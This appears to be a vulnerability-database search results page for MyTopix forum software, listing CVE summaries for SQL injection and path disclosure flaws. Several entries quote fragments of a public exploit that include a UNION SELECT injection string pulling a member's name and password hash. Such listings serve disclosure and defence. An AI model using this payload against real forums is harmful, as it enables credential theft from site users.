26 matches found
EUVD-2006-0595
Malware in sbrugna...
EUVD-2006-0596
Malware in sbrugna...
EUVD-2008-6300
Malware in sbrugna...
MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit
No description provided by source. ?php / MyTopix = 1.3.0 notes send Remote SQL Injection Exploit Bug discovered & exploited by cOndemned Desc : In order to exploit this vulnerability user have to be logged on the forum, so I'd decided to write this exploit x Greetz : Ex. fobidd3n t3am - Sw33t,...
CVE-2008-6330
SQL injection vulnerability in index.php in MyTopix 1.3.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the send parameter in a notes action...
Sql injection
SQL injection vulnerability in index.php in MyTopix 1.3.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the send parameter in a notes action...
CVE-2008-6330
SQL injection vulnerability in index.php in MyTopix 1.3.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the send parameter in a notes action...
CVE-2008-6330
CVE-2008-6330 affects MyTopix 1.3.0 and earlier, where an SQL injection is possible in index.php via the send parameter in a notes action. The vulnerability allows remote authenticated users to execute arbitrary SQL commands. According to NVD metrics, the exploit is network-based with low attack ...
MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit
No description provided by source. ?php / MyTopix = 1.3.0 notes send Remote SQL Injection Exploit Bug discovered & exploited by cOndemned Desc : In order to exploit this vulnerability user have to be logged on the forum, so I'd decided to write this exploit x Greetz : Ex. fobidd3n t3am - Sw33t,...
MyTopix 1.3.0 - SQL Injection
evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--'; private function send$packet if!$this - socket $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; socketconnect$this -...
MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================================== MyTopix evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--';...
MyTopix 1.3.0 - SQL Injection
MyTopix 1.3.0 - SQL Injection evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--'; private function send$packet if!$this - socket $this - socket = socketcreateAFINET, SOCKSTREAM,...
mytopix-sql.txt
evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--'; private function send$packet if!$this - socket $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; socketconnect$this -...
Sql injection
SQL injection vulnerability in search.php in MyTopix 1.2.3 allows remote attackers to execute arbitrary SQL commands via the 1 mid and 2 keywords parameters...
CVE-2006-0590
MyTopix 1.2.3 allows remote attackers to obtain the installation path via an invalid hl parameter to index.php, which leads to path disclosure, possibly related to invalid SQL syntax...
CVE-2006-0589
MyTopix 1.2.3 allows remote attackers to obtain the installation path via a direct request to logon.mod.php, which leaks the path in an error message...
Path traversal
MyTopix 1.2.3 allows remote attackers to obtain the installation path via an invalid hl parameter to index.php, which leads to path disclosure, possibly related to invalid SQL syntax...
CVE-2006-0588
SQL injection vulnerability in search.php in MyTopix 1.2.3 allows remote attackers to execute arbitrary SQL commands via the 1 mid and 2 keywords parameters...
CVE-2006-0589
MyTopix 1.2.3 allows remote attackers to obtain the installation path via a direct request to logon.mod.php, which leaks the path in an error message...
CVE-2006-0590
The CVE-2006-0590 entry affects MyTopix 1.2.3, where a malformed hl parameter sent to index.php allows remote attackers to disclose the installation path. The underlying issue is described as path disclosure, with a note that it might be related to invalid SQL syntax. Public references in the rec...